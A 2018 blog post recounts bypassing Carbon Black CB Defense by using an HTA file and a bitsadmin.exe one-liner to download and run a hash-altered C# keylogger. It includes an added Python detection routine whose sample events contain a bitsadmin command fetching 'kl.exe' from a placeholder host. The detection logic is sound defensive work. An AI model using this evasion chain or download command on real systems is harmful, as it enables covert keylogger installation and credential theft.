Carbon Black, bypassed and C# Keylogger Deployed Successfully.
- emmanuellws
- Apr 24, 2018
- 1 min read
What is more exciting than being able to bypass one of the most powerful and famous next-gen AV products, Carbon Black CB Defense, in Lockdown Mode and with PowerShell DISABLED!
CB Defense does include a kind of "system hardening" policy, pushed from the cloud to the agent and applied to the system.
My first successful test was with PowerShell enabled on that system. Later, before I shot the video, the policy was set to block the "powershell" command, but that didn't stop me from finding another built-in Windows command to download and deploy the keylogger.
Again, it was HTA that made this attack possible. This time it was not generated by any payload generator: no Venom, no Empire, no FatRat, no Veil. It was a plain, non-obfuscated bitsadmin.exe one-liner (not PowerShell) to download and execute the C# keylogger, whose source code and MD5 had been changed to evade detection.
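As an added example (not the author's code and not part of the demo), a small Python detection routine that flags the pattern described above from the defender's side: bitsadmin.exe being handed a download job, with a higher severity when its parent is mshta.exe, the host that runs an HTA file. The events, paths and URL are constructed; the event layout (parent image, child image, command line) is assumed to be what a normalised EDR or Sysmon process-creation feed would provide.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events (not taken from the original post).
# Each tuple is (parent image, child image, child command line).
SAMPLE_EVENTS = [
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\mshta.exe",
     "mshta.exe C:\\Users\\victim\\Downloads\\invoice.hta"),
    ("C:\\Windows\\System32\\mshta.exe", "C:\\Windows\\System32\\bitsadmin.exe",
     "bitsadmin.exe /transfer upd /download /priority high "
     "http://update.example.invalid/kl.exe C:\\Users\\Public\\kl.exe"),
    ("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\System32\\bitsadmin.exe",
     "bitsadmin.exe /list /allusers"),
]

# Script hosts that should rarely need to spawn bitsadmin; mshta.exe runs HTA files.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# bitsadmin switches that create or feed a transfer job (documented bitsadmin syntax).
DOWNLOAD_SWITCHES = re.compile(r"/(transfer|addfile|create|resume)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)

@dataclass
class Alert:
    severity: str
    reason: str
    command_line: str

def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def evaluate(parent, image, cmdline):
    """Return an Alert when bitsadmin is given a remote download job, else None.
    Severity is raised when the parent is a script host such as mshta.exe."""
    if basename(image) != "bitsadmin.exe":
        return None
    if not (DOWNLOAD_SWITCHES.search(cmdline) and URL_RE.search(cmdline)):
        return None
    if basename(parent) in SCRIPT_HOSTS:
        return Alert("high", "bitsadmin download job spawned by " + basename(parent), cmdline)
    return Alert("medium", "bitsadmin download job from a remote URL", cmdline)

def scan(events):
    """Apply evaluate() to every (parent, image, cmdline) tuple and keep the hits."""
    return [a for a in (evaluate(*e) for e in events) if a is not None]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert.severity, alert.reason, alert.command_line)
```

Blocking PowerShell alone leaves this path open; a rule like this, combined with application whitelisting of bitsadmin.exe and mshta.exe for ordinary users, closes the gap the post describes.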
After the SentinelOne and CB Defense bypass demo video I made, in the end I have to admit that signature-based protection and application whitelisting are still required alongside the most advanced and powerful behavioral detection and protection, visibility, and response.
Companies need to look at layered defense for endpoints, not just a single advanced behavioral protection layer with visibility and response.